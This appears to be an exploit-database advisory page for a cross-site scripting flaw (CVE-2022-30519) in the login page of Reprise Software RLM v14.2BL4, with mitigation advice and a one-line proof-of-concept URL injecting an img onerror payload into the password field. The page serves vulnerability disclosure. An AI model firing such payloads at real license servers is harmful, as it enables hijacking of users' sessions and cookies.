header-logo
Suggest Exploit
vendor:
RLM
by:
Mohammed A.Siledar
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: RLM
Affected Version From: rlm.v14.2BL4
Affected Version To: rlm.v14.2BL4
Patch Exists: NO
Related CWE: CVE-2022-30519
CPE: rlm.v14.2BL4-x64_w3.admin.exe
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2021

Reprise Software RLM v14.2BL4 – Cross-Site Scripting (XSS)

Reprise Software RLM v14.2BL4 is vulnerable to Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the username and password fields of the login page. This code will be executed when the page is loaded by the victim, allowing the attacker to perform malicious actions such as stealing cookies, session tokens, etc.

Mitigation:

Input validation should be performed on all user-supplied data to prevent XSS attacks. Sanitizing user input by encoding special characters can also help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title:  Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10

# Proof Of Concept: 

http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E


Best Regards.